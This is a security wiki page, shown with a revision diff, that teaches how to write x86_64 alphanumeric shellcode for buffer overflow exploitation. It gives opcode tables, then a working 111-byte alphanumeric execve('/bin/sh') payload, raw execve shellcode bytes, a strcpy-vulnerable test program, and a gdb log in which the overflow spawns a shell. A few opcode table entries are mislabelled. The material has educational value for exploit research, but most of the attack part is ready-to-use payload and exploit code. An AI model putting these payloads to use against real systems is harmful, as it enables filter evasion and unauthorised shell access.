Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcode/Alphanumeric"

From NetSec
Jump to: navigation, search
(Stack Analysis)
Line 743: Line 743:
 
* %rsi and %rdx are null
 
* %rsi and %rdx are null
 
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code.  The '''xor''' and '''imul''' instructions can then be used to set values on registers.
 
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code.  The '''xor''' and '''imul''' instructions can then be used to set values on registers.
 
==Stack Analysis==
 
{{info|These buffer dumps have been shortened for brevity and readability.}}
 
[root@ares bha]# gdb -q ./bof
 
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.
 
(gdb)  r $(perl -e 'print "A"x232;')
 
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')
 
Program received signal SIGSEGV, Segmentation fault.
 
0x0000000000400525 in main ()
 
(gdb) x/500x $rsp                                   
 
  '''0x7fffffffe3c8''': 0x41414141      0x41414141      0x41414141      0x41414141
 
  0x7fffffffe3d8: 0xffffe400      0x00007fff      0x00000000      0x00000002
 
  ..........................
 
  0x7fffffffe708: 0x2f656d6f      0x68726f76      0x2f736565      0x2f616862
 
  0x7fffffffe718: 0x00666f62      '''0x41414141      0x41414141      0x41414141'''
 
  0x7fffffffe728: '''0x41414141      0x41414141      0x41414141      0x41414141'''
 
 
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.
 
{| class="wikitable"
 
|-
 
|'''Operation'''
 
|<b>Value</b>
 
|<b>Comments</b>
 
|-
 
|<center>
 
 
 
'''+'''
 
 
'''-'''</center>
 
|0x7fffffffe726
 
 
0x71
 
 
0x7fffffffe3c8
 
|
 
:[[return address]]
 
 
:[[shellcode]] length (113 characters)
 
 
:%rsp
 
|-
 
 
|-
 
|<center>'''='''</center>
 
|<b>0x3cf</b>
 
|
 
:'''Calculated Offset from %rsp at time of overflow'''
 
|-
 
|}
 
  
 
==The Offset==
 
==The Offset==

Revision as of 00:49, 29 November 2012

Alphanumeric shellcode is similar to ascii shellcode in that it is used to bypass character filters and evade intrusion-detection during buffer overflow exploitation. Alphanumeric shellcode can be used to determine a number of factors about the target environment, including the return pointer via a last call technique or the instruction set architecture using a getCPU stub. Available alphanumeric opcodes for the 64-bit x86 architecture limit the use of modifiers to pop, movslq, xor, and imul.


c3el4.png
While it is possible to write x86 intercompatible alphanumeric shellcode, this article primarily documents alphanumeric code for the 64 bit x86 architecture.
Shellcode/Alphanumeric requires a basic understanding of bitwise math, assembly and shellcode.


Special thanks to hatter for his contributions to this article.

Alphanumeric x86_64 register value and data manipulation

Given the limited set of instructions for alphanumeric shellcode, its important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to mov emulations, which make up most of the actual code.

Push: alphanumeric x86_64 registers

Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.


One-byte, two-byte, and four-byte quantities
Assembly Hexadecimal Alphanumeric ASCII
pushw [word] \x66\x68\x##\x## fh??
pushq [byte] \x6a\x## j?
pushq [dword] \x68\x##\x##\x##\x## h????


Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.


Push: X86_64 Extended Registers
Assembly Hexadecimal Alphanumeric ASCII
push %rax \x50 P
push %rcx \x51 Q
push %rdx \x52 R
push %rbx \x53 S
push %rsp \x54 T
push %rbp \x55 U
push %rsi \x56 V
push %rdi \x57 W


For the general registers R8-R15 "A" is prefixed to the corresponding RAX-RDI register push.


Push: X86_64 General Registers
Assembly Hexadecimal Alphanumeric ASCII
push %r8 \x41\x50 AP
push %r9 \x41\x51 AQ
push %r10 \x41\x52 AR
push %r11 \x41\x53 AS
push %r12 \x41\x54 AT
push %r13 \x41\x55 AU
push %r14 \x41\x56 AV
push %r15 \x41\x57 AW


For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.


Push: X86_64 16 bit Registers
Assembly Hexadecimal Alphanumeric ASCII
push %ax \x66\x50 fP
push %cx \x66\x51 fQ
push %dx \x66\x52 fR
push %bx \x66\x53 fS
push %sp \x66\x54 fT
push %bp \x66\x55 fU
push %si \x66\x56 fV
push %di \x66\x57 fW


For the 16 bit general registers R8B-R15b "f" is prefixed to the corresponding R8-R15 register push.


Push: X86_64 16 bit General Registers
Assembly Hexadecimal Alphanumeric ASCII
push %r8w \x66\x41\x50 fAP
push %r9w \x66\x41\x51 fAQ
push %r10w \x66\x41\x52 fAR
push %r11w \x66\x41\x53 fAS
push %r12w \x66\x41\x54 fAT
push %r13w \x66\x41\x55 fAU
push %r14w \x66\x41\x56 fAV
push %r15w \x66\x41\x57 fAW

Pop: alphanumeric x86_64 registers

Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RAX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed).

Pop: X86_64 Extended Registers
Assembly Hexadecimal Alphanumeric ASCII
pop %rax \x58 X
pop %rcx \x59 Y
pop %rax \x5a Z


For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop.


Pop: X86_64 General Registers
Assembly Hexadecimal Alphanumeric ASCII
pop %r8 \x41\x58 AX
pop %r9 \x41\x59 AY
pop %r10 \x41\x5a AZ


16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):

Assembly Hexadecimal Alphanumeric ASCII
pop %ax \x66\x58 fX
pop %cx \x66\x59 fY
pop %dx \x66\x5a fZ
pop *%r8w \x66\x41\x58 fAX
pop *%r9w \x66\x41\x59 fAY
pop *%r10w \x66\x41\x5a fAZ

Using push and pop the values of 6 fullsize CPU registers can be set:

  • %rax
  • %rcx
  • %rdx
  • %r8
  • %r9
  • %r8

Or get any values of 16 fullsize CPU registers to the top of the stack:

  • %r8-%r15
  • %rax-%rdi

Prefixes

Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):

  • %rbx
  • %rsp
  • %rbp
  • %rsi
  • %rdi

This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop. Using only the registers already accessed, an attempt will be made to get instructions for to set values.

The special register prefix has been identified:

 0x41, 'A'

The word operand override has been identified,

 0x66, 'f'.

Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.

Hex Value Alpha Value Description
0x36 6  %ss segment override
0x64 d  %fs segment override
0x65 e  %gs segment override
0x66 f 16-bit operand size
0x67 g 16-bit address size
0x41 A 64-bit special register use (%r##)
0x48 H 64-bit register size override
0x40-4f B-P Special 64-bit overrides

Operands

Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction:

Assembly Hexadecimal Alpha
<syntaxhighlight lang="asm">xor $0x[byte](%rax),%ebx</syntaxhighlight> \x33\x58\x## 3X?

The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:

Assembly Hexadecimal Alpha
<syntaxhighlight lang="asm">xor $0x[byte](%rcx),%ebx</syntaxhighlight> \x33\x59\x## 3Y?

Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example:

Assembly Hexadecimal Alpha
<syntaxhighlight lang="asm">xor $0x[byte]({reg}),%ebx</syntaxhighlight> \x33\x??\x## 3*?

The opcodes for %rax, %rcx, and %rdx are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.

The rbx, rsp, and rbp registers

Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:

  •  %ebx
  •  %bx
  •  %bh
  •  %bl

Apon further investigation, this opened up access to multiple additional registers using:

  • Xor
  • Imul
  • Movslq
Assembly Hexadecimal Alpha
<syntaxhighlight lang="asm">xor $0x[byte]({reg64}),{reg32}</syntaxhighlight> \x33\x??\x#1 3*1
imul $0x[dword1],0x[byte2]({reg64}),{reg32}
\x69\x??\x#2\x#1\x#1\x#1\x#1 i*21111
imul $0x[byte1],0x[byte2]({reg64}), {reg32}
\x6b\x??\x#2\x#1 k*21
movslq 0x[byte1]({reg64}), {reg32}
\x63\x??\x#1 c*1

To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If preferred to use the special 64 bit registers, 0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).

Assembly Hexadecimal Alpha
imul   $0x[byte1],0x[byte2]({reg64}),{reg64}
\x48\x6b\x??\x#2\x#1 Hk*21

To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:

  •  %rbp
  •  %rsp

Xor

Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:

Hexadecimal Assembly
0x34 <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight>
0x35 <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight>
0x48 0x35 <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight>

0x30 is a multi-byte xor instruction. Requiring at least two operands (even if register denote):

Hexadecimal Assembly
0x30 <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight>
<syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight>

0x31 is as flexible as 0x30. Not all permutations are included for brevity.

Hexadecimal Assembly
0x31 <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight>

0x32 is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.

Hexadecimal Assembly
0x32 <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight>

0x33 is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.

Hexadecimal Assembly
0x33 <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight>

The rsi and rdi registers

Combining the knowledge of xor with the knowledge of the stack. When any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:

  • %rbx
  • %rsp
  • %rbp
  • %rsi
  • %rdi

First, utilise push and pop to simulate 'mov':

<syntaxhighlight lang="asm"> push %rsp; \x54 pop  %rcx; \x59 pop  %rax; \x5a (This just sets the pointer back) </syntaxhighlight>

Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:

<syntaxhighlight lang="asm"> push %rsi; \x56 xor %ss:(%rcx), %rsi; \x36\x48\x33\x31 pop %r8; \x41\x58 push %rdi; \x57 xor %ss:(%rcx), %rdi; \x36\x48\x33\x39 pop %r8 </syntaxhighlight>

Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:

  • %rax
  • %rcx
  • %rdx
  • %rsi
  • %rdi
  • %r8
  • %r9
  • %r10
  • %r14
  • %r15

So far, in this sample, full control has not been utilized over:

  • %rsp
  • %rbp
  • %rbx
  • %r11
  • %r12
  • %r13

Similar to push, controllable data is required before the setting of a register. Where pop is concerned, something might be required to be pushed to the stack first, in this case, only the zero register is required. Due to the way that XOR works, once a zero is registered at all, in this case %rax is used as the zero register, it can be used to get %rbx, %rsp, and %rbp to zero if needed:

To get %rbx:

<syntaxhighlight lang="asm"> xor %ss:0x30(%rcx), %rax; store that value in rax xor %rax, %ss:0x30(%rcx); Null that area of stack imul $0x30,%ss:0x30(%rax),%rbx; 0x30 * 0 = 0 imul $0x30,%ss:0x30(%rax),%rbp; 0x30 * 0 = 0 </syntaxhighlight>

Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):

<syntaxhighlight lang="asm"> xor  %rax,%ss:0x30(%rcx); 36 48 31 41 30 xor  %ss:0x30(%rcx),%rbp; 36 48 33 69 30 </syntaxhighlight>

The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1,2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov :

<syntaxhighlight lang="asm"> movslq %ss:0x30(%rcx), %rsi xor %rsi, %ss:0x30(%rsi) </syntaxhighlight>

This can come in quite handy when chunking large pieces of data to 0.

Example: Zeroing Out x86_64 CPU Registers

First %rsp is pushed to the top of the stack and the pointer address is popped into in %rcx, the third pop is to ensure that the pointer address matches what is now in %rcx.

<syntaxhighlight lang="asm">

       push %rsp
       pop %rcx
       pop %r8             

</syntaxhighlight>

The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop.

<syntaxhighlight lang="asm">

       push %rsi
       xor %ss:(%rcx), %rsi
       pop %r8

</syntaxhighlight>

Again using the same form,  %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx.

<syntaxhighlight lang="asm">

       push %rdi
       xor %ss:(%rcx), %rdi
       pop %r8

</syntaxhighlight>

Zeroing out RDX is much simpler.

<syntaxhighlight lang="asm">

       push %rdi
       pop %rdx

</syntaxhighlight>

The following push and pop sets %rax to 0x30.  %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out $rax.

<syntaxhighlight lang="asm">

       push $0x30
       pop %rax
       xor $0x30, %al

</syntaxhighlight>

For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.

Zero out the %ss:0x30(%rcx) stack segment.

<syntaxhighlight lang="asm">

       xor %ss:0x30(%rcx), %rax
       xor %rax, %ss:0x30(%rcx)

</syntaxhighlight>

xor %rbx into the stack segment and then xor it against rbx to zero.

<syntaxhighlight lang="asm">

       xor %rbx, %ss:0x30(%rcx)
       xor %ss:0x30(%rcx), %rbx

</syntaxhighlight>

Rezero the stack segment with %rax.

<syntaxhighlight lang="asm">

       push %rdx
       pop %rax
       xor %ss:0x30(%rcx), %rax
       xor %rax, %ss:0x30(%rcx)

</syntaxhighlight>

As before, xor %rbp into the stack segment and then xor it against rbp to zero.

<syntaxhighlight lang="asm">

       xor %rbp, %ss:0x30(%rcx)
       xor %ss:0x30(%rcx), %rbp

</syntaxhighlight>

64 bit shellcode: Conversion to alphanumeric code

  • Because of the limited instruction set, the conversion requires many mov emulations via xor, mul, movslq, push, and pop.

bof.c

c3el4.png This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.
 
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[]){
        char buffer[200];
        strcpy(buffer,  argv[1]);
        return 0;
}
 

Starting shellcode (64-bit execve /bin/sh)

c3el4.png This was converted to shellcode from the example in 64 bit linux assembly
  • execve('/bin/sh');
 
.section .data
.section .text
.globl _start
_start:
 
 # a function is f(%rdi, %rsi, %rdx, %r10, %r8, %r9).
 # Use zeroed memory to zero out %rsi, %rdi, %rdx
 xor %rdi, %rdi
 push %rdi
 push %rdi
 pop %rsi
 pop %rdx
 
 # Store '/bin/sh\0' in %rdi
 movq $0x68732f6e69622f6a, %rdi
 shr $0x8,%rdi
 push %rdi
 push %rsp
 pop %rdi
 push $0x3b
 pop %rax
 syscall                                # execve('/bin/sh', null, null)
                                        # function no. is 59/0x3b - execve()
 
  • execve('/bin/sh')
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

Shellcode Analysis

Immediately before the syscall:

  •  %rax is set to 0x3b
  •  %rdi is a pointer to '/bin/sh\0'
  •  %rsi and %rdx are null

To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code. The xor and imul instructions can then be used to set values on registers.

The Offset

  • To prepare for xor and imul manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.
 
        # Set %rcx as stack pointer 
        # and align %rsp 
        push $0x5a
        push %rsp
        pop %rcx
        pop %rax
 
  • Preparing for imul, an xor is used to place 0x0f into %rax, then push %rax to the stack.
 
        # Get magic offset and store in %rdi
        xor $0x55, %al
        push %rax                       # 0x0f on the stack now.
 
  • Because 0x41 * 0x0f = 0x3cf (975), the offset can be calculated in purely alphanumeric form. Modify this as code distances itself from the stack pointer during an exploit. The offset is stored in %rdi after setting back the stack pointer.
 
        pop %rax                        # add back to %esp
        imul  $0x41, (%rcx), %edi       # %rdi = 0x3cf, a "magic offset" for us
 

The Syscall

  • Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:
 
        movslq (%rcx,%rdi,1), %rsi
        xor %esi, (%rcx,%rdi,1)
 
  • This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a syscall.
 
        push $0x3030474a
        pop %rax
        xor $0x30304245, %eax
 
  • The %rax register now contains 0x050f. Put 0x0f050000 at (%rcx) - then set the stack pointer back.
 
        push %rax
        pop %rax                        # Garbage reg
 
  • A mov emulation is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:
 
        movslq (%rcx), %rsi
        xor %esi, (%rcx,%rdi,1)
 

Arguments

Stack Space

  • Zero out a qword of data starting at %rcx + 0x30 (48 in decimal)
 
        # Allocate stack space
        movslq 0x30(%rcx), %rsi
        xor %esi, 0x30(%rcx)
        movslq 0x34(%rcx), %rsi
        xor %esi, 0x34(%rcx)
 

Register Initialization

  • The %rdx, %rdi, and %rsi registers are used for the execve() syscall. These are zeroed out to initialize their values using the stack space previously allocated.
 
        # Zero rdx, rsi, and rdi
        movslq 0x30(%rcx), %rdi
        movslq 0x30(%rcx), %rsi
        push %rdi
        pop %rdx
 

String Argument

  • /bin is placed onto the stack at the space allocated at %rcx + 0x30.
 
        push $0x5a58555a
        pop %rax
        xor $0x34313775, %eax
        xor %eax, 0x30(%rcx)
 
  • /sh\0 is placed onto the stack at the space allocated at %rcx + 0x34.
 
        push $0x6a51475a
        pop %rax
        xor $0x6a393475, %eax
        xor %eax, 0x34(%rcx)            
 
  • xor is used as a mov emulation to place '/bin/sh\0' into %rdi.
 
        xor 0x30(%rcx), %rdi
 
  • Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.
 
        pop %rax
        push %rdi
 

Final Registers

  •  %rsi and %rdx are 0. First, push a byte to meet the sign requirement for movslq, then zero %rdi.
 
        push $0x58
        movslq (%rcx), %rdi
        xor (%rcx), %rdi       
 
  • Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi.  %rdi then contains a pointer to '/bin/sh\0'.
 
        pop %rax
        push %rsp
        xor (%rcx), %rdi
 
  •  %rax is set to 59 or 0x3b for the execve() syscall.
 
        xor $0x63, %al
 

Final registers:

  •  %rax = 0x3b
  •  %rdi = pointer to '/bin/sh\0'
  •  %rsi = null
  •  %rdx = null

Payload

  • x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:
 jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c

Successful Overflow Test

c3el4.png This shellcode was tested on a modified bof.c to make the buffer 200 bytes in stead of 100 bytes, as the shellcode here exceeds the original buffer size.
[user@host bha]# gdb -q ./bof
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.
(gdb) r `perl -e 'print  "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`
Starting program: /home/hatter/bha/bof `perl -e 'print  "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 .
"\x26\xe7\xff\xff\xff\x7f";'`
process 28444 is executing new program: /bin/bash
[user@host bha]# uname -m
x86_64
[user@host bha]# exit
exit
[Inferior 1 (process 28444) exited normally]
(gdb)